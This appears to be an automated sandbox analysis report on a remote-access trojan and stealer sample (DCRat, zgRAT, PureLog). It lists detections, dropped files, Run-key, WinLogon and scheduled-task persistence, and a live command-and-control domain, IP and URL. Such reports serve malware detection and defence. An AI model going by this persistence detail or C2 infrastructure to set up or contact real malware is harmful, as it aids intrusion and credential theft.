Source: Yara match	File source: 0.0.0J5DzstGPi.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1724618410.0000000000992000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\sihost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 0J5DzstGPi.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0J5DzstGPi.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\sihost.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1845656712.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0J5DzstGPi.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: steBCuuQsIefcKufvgYbRBCxKhPR.exe PID: 4040, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: steBCuuQsIefcKufvgYbRBCxKhPR.exe PID: 5496, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0J5DzstGPi.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0J5DzstGPi.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1724618410.0000000000992000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\sihost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 0J5DzstGPi.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0J5DzstGPi.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\sihost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	2 File and Directory Discovery	1 Taint Shared Content	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	31 Registry Run Keys / Startup Folder	31 Registry Run Keys / Startup Folder	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	343 Masquerading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0J5DzstGPi.exe	60%	Virustotal		Browse
0J5DzstGPi.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
0J5DzstGPi.exe	100%	Avira	HEUR/AGEN.1323342
0J5DzstGPi.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\EOeBPHNE.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\LBEMCr2GFO.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\sihost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\PCJszSHm.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\BKvCmawc.log	100%	Joe Sandbox ML
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	100%	Joe Sandbox ML
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	100%	Joe Sandbox ML
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	100%	Joe Sandbox ML
C:\Recovery\sihost.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\PCJszSHm.log	100%	Joe Sandbox ML
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\sihost.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\steBCuuQsIefcKufvgYbRBCxKhPR.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BKvCmawc.log	8%	ReversingLabs
C:\Users\user\Desktop\EOeBPHNE.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\MzWJdjDq.log	25%	ReversingLabs
C:\Users\user\Desktop\PCJszSHm.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\UciiGfGr.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\edFhLbSI.log	8%	ReversingLabs
C:\Users\user\Desktop\fQNZqrBZ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\oMZxvDXp.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\tdboTeDy.log	25%	ReversingLabs
C:\Users\user\Desktop\xcpeKNWo.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://337703cm.n9sh.top/	100%	Avira URL Cloud	malware
http://337703cm.n9sh.top/Basecentral.php	100%	Avira URL Cloud	malware
http://337703cm.n9sh.top	100%	Avira URL Cloud	malware
http://crl.miYy	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
337703cm.n9sh.top	185.158.202.52	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://337703cm.n9sh.top/Basecentral.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://337703cm.n9sh.top	steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.1930279063.00000000030DB000.00000004.00000800.00020000.00000000.sdmp, steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.1930279063.00000000032A0000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000018.00000002.3240116143.00000202763E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3144175197.0000014DD8E15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3176239130.0000028343806000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2980854227.000001EA57066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2967168155.000002B990076000.00000004.00000800.00020000.00000000.sdmp	false		high
http://337703cm.n9sh.top/	steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.1930279063.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000020.00000002.1898978062.000002B980227000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.miYy	powershell.exe, 00000017.00000002.3319320381.000002232C6EB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000017.00000002.1907943150.0000022314558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1919842164.0000020266598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1907889706.0000014DC8FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1907759748.00000283339B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1904170467.000001EA47217000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1898978062.000002B980227000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000020.00000002.1898978062.000002B980227000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000017.00000002.1907943150.0000022314558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1919842164.0000020266598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1907889706.0000014DC8FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1907759748.00000283339B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1904170467.000001EA47217000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1898978062.000002B980227000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000020.00000002.2967168155.000002B990076000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000018.00000002.3240116143.00000202763E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3144175197.0000014DD8E15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3176239130.0000028343806000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2980854227.000001EA57066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2967168155.000002B990076000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 0000001E.00000002.3291262702.000001EA5F122000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000020.00000002.2967168155.000002B990076000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mic	powershell.exe, 0000001E.00000002.3316028895.000001EA5F41E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000020.00000002.2967168155.000002B990076000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micft.cMicRosof	powershell.exe, 0000001E.00000002.3316028895.000001EA5F41E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000017.00000002.1907943150.0000022314331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1919842164.0000020266371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1907889706.0000014DC8DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1907759748.0000028333791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1904170467.000001EA46FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1898978062.000002B980001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0J5DzstGPi.exe, 00000000.00000002.1803810582.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1907943150.0000022314331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1919842164.0000020266371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1907889706.0000014DC8DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1907759748.0000028333791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1904170467.000001EA46FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1898978062.000002B980001000.00000004.00000800.00020000.00000000.sdmp, steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.1930279063.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000020.00000002.1898978062.000002B980227000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.158.202.52	337703cm.n9sh.top	Netherlands		20847	PREVIDER-ASNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584721
Start date and time:	2025-01-06 10:31:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	64
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	0J5DzstGPi.exe renamed because original name is a hash value
Original Sample Name:	fecafe9a80257e221c47577e704498f3.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@55/66@1/1
EGA Information:	Successful, ratio: 57.1%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7192 because it is empty
Execution Graph export aborted for target steBCuuQsIefcKufvgYbRBCxKhPR.exe, PID 4040 because it is empty
Execution Graph export aborted for target steBCuuQsIefcKufvgYbRBCxKhPR.exe, PID 5496 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:32:10	API Interceptor	185x Sleep call for process: powershell.exe modified
04:32:22	API Interceptor	1x Sleep call for process: steBCuuQsIefcKufvgYbRBCxKhPR.exe modified
09:32:08	Task Scheduler	Run new task: 0J5DzstGPi path: "C:\Users\user\Desktop\0J5DzstGPi.exe"
09:32:08	Task Scheduler	Run new task: 0J5DzstGPi0 path: "C:\Users\user\Desktop\0J5DzstGPi.exe"
09:32:08	Task Scheduler	Run new task: sihost path: "C:\Recovery\sihost.exe"
09:32:09	Task Scheduler	Run new task: sihosts path: "C:\Recovery\sihost.exe"
09:32:09	Task Scheduler	Run new task: steBCuuQsIefcKufvgYbRBCxKhPR path: "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
09:32:09	Task Scheduler	Run new task: steBCuuQsIefcKufvgYbRBCxKhPRs path: "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
09:32:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
09:32:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Recovery\sihost.exe"
09:32:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0J5DzstGPi "C:\Users\user\Desktop\0J5DzstGPi.exe"
09:32:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
09:32:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Recovery\sihost.exe"
09:32:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0J5DzstGPi "C:\Users\user\Desktop\0J5DzstGPi.exe"
09:33:03	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
09:33:12	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Recovery\sihost.exe"
09:33:22	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 0J5DzstGPi "C:\Users\user\Desktop\0J5DzstGPi.exe"
09:33:39	Autostart	Run: WinLogon Shell "C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
09:33:48	Autostart	Run: WinLogon Shell "C:\Users\Default User\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
09:33:57	Autostart	Run: WinLogon Shell "C:\Recovery\sihost.exe"
09:34:07	Autostart	Run: WinLogon Shell "C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
09:34:16	Autostart	Run: WinLogon Shell "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
09:34:24	Autostart	Run: WinLogon Shell "C:\Users\user\Desktop\0J5DzstGPi.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.158.202.52	t8F7Ic986c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	797441cm.n9shteam2.top/Videouploads.php
185.158.202.52	QH67JSdZWl.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	487997cm.renyash.top/VideoFlowergeneratorTestpublic.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PREVIDER-ASNL	t8F7Ic986c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.158.202.52
	QH67JSdZWl.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.158.202.52
	kWZnXz2Fw7.elf	Get hash	malicious	Mirai	Browse	84.241.133.1
	aQvU3QHA3N.elf	Get hash	malicious	Unknown	Browse	62.165.97.41
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	84.241.184.118
	http://maritimecybersecurity.nl	Get hash	malicious	Unknown	Browse	31.7.2.29
	21y8z80div.elf	Get hash	malicious	Mirai	Browse	80.65.103.15
	botx.arm7.elf	Get hash	malicious	Mirai	Browse	84.241.184.103
	BLBq6xYqWy.elf	Get hash	malicious	Mirai	Browse	80.65.126.250
	https://expressinvoice.mijnparagon-cc.nl/	Get hash	malicious	Unknown	Browse	84.241.158.7

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\BKvCmawc.log	HMhdtzxEHf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	t8F7Ic986c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	544WP3NHaP.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	1znAXdPcM5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	QH67JSdZWl.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	U1jaLbTw1f.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files\Mozilla Firefox\17c9f4d4cfaa6e

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with very long lines (748), with no line terminators
Category:	dropped
Size (bytes):	748
Entropy (8bit):	5.902790752951851
Encrypted:	false
SSDEEP:	12:kiJRJu9K3XtvtIpCwITCifD5zxTzVK8Z/3wH2Y6IL2qcm1ivncYUbWNStmYd8iMQ:Jvu9sXY6bfD5zJ1e24LeEYU7mYd8jQ
MD5:	5A223466376A0248619C84DCF541B559
SHA1:	C71C7204BAF5D859AB71EAC977552699C5AE9B2B
SHA-256:	208FF1D9F4E955062FCF226391D196925E0422D2AA87470A5EFC991450110AF6
SHA-512:	35CA659A3FB2DC333B2EC8DCAAFABC8F63D17659C86D0E8982EF2FE20D6F61745DAB31DCEFE21A5609CED3B054EDCF72401DDE4AA15B29811CC3DAC705540250
Malicious:	false
Preview:	e5Gbm0fh8DmLJ7IUNNIknqqSpH6BInk8ZBENQhV6dTEmyy7bOAx68uGxOxwf3eZVcowI24Eq1MGTmDe1KfwHzo9o4Q8cv0C93tJJByiU6HFwnxLLS5VYrSfyoHNm5l4AJHZ23UzV6bKrjNAHFxK0foRlNVf4k6ZUMEmgXSR7F9bQIyPaGGgHbEff0ypiz4uACzeeletxfMufNAdYGEyeZR3IjGpjntILOaNSUuzlXtlPU9SzUQbuGQlu5W5ezKJwDiRwxKEVOMGppoxkyzOWRYE7ycW8zVwNjzLvrfCKLGf4J6FRiVp95xepeT7UyGg3Z3F0cC2SxELL2Ky2XEadqwRwUgRYirWFjmeQ0OzfdWM1lTwTfF7tqDNnmSf5vduFsFmQqhBIP4ATjaLBu72dumZgZ1nit3u9lHJgrfn7DydvC3DLHeLxkRUFqF1y3dZWKArcQoUOU5Z6JodfxbaOr7YUwEzloyDjYGlBLk5cJ6cp2Y5CmVBbCKpNmXpMytjf1zhDDbTNg8FuetcYJx8TxlhNbXZy5snaX7xC019KBy5EF4t35RDBuPsQSTlpCfRyUoXg5ZhRyxS9qdIhog2opmpHOgtgPTIggGtagM7ftwM77tjzLEAfmnJs9PSYqABepwdjtrAcjX42ZsKf74VLTm327BbR3izsvrSLQAFeEi6PsQSRFwbwp0LC2klsQtiBiMHsa8P6y1GvpoJrsJLGGCC5fPSpYXNV95rgIk1Hhf8y

C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1958912
Entropy (8bit):	7.551015834552122
Encrypted:	false
SSDEEP:	49152:RbYg0qXO9NNBZXRd6ewK8LrcOk+tWh08RT:hYg039NNBx3lGMh08R
MD5:	FECAFE9A80257E221C47577E704498F3
SHA1:	79960AA863F445B93531AFC55AAD6215A2C1BB08
SHA-256:	953D9C6534DD4DDA5DC6C53755974E39947672EA521DDFB613A8C28A4F3C10E3
SHA-512:	C48694E93A5B46BB9CB6ADA78E8AD642D142BE7B27249BB5E75521B14EB5805C9CD51FA7836D91C40840F2E7FBB46E4B8AEEDB9EAB688FC26020EBA03F381141
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................ .......H.......h...............(...'...d........................................0..........(.... ........8........E....)...N.......M...8$...(.... ....~z...{....9....& ....8....(.... ....~z...{....:....& ....8....(.... ....~z...{....:....& ....8y......0.......... ........8........E............%.......p.......8....r...ps....z~....9y... ....8....~....(3... .... .... ....s....~....(7....... ....~z...{....9~...& ....8s...8.... ....~z...{....:Z...& ....8O......... ....8?.......~....(;..

C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\17c9f4d4cfaa6e

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with very long lines (914), with no line terminators
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.908313919456535
Encrypted:	false
SSDEEP:	24:nuKDay8MXQuT/NCs00BfQmJSd8fXQWPeX:nKKjT/NCsLQc3YWPa
MD5:	3742532260301B50EBD7DA5E7470DE05
SHA1:	8BAC4F51A86E16BABB250DB70AA053E581982977
SHA-256:	B0A6422C2CEFDFA683F417724E51E1CB8936EBD52B49966F45AD97FB90F39A2C
SHA-512:	804A795EA68782782944396096A4530E771EA0302635FD3C543606A5DD9A1566D0C27A4573DC16C1B0EE5129B1156A39054AC97D15804FF02AE00AD1D2986AF7
Malicious:	false
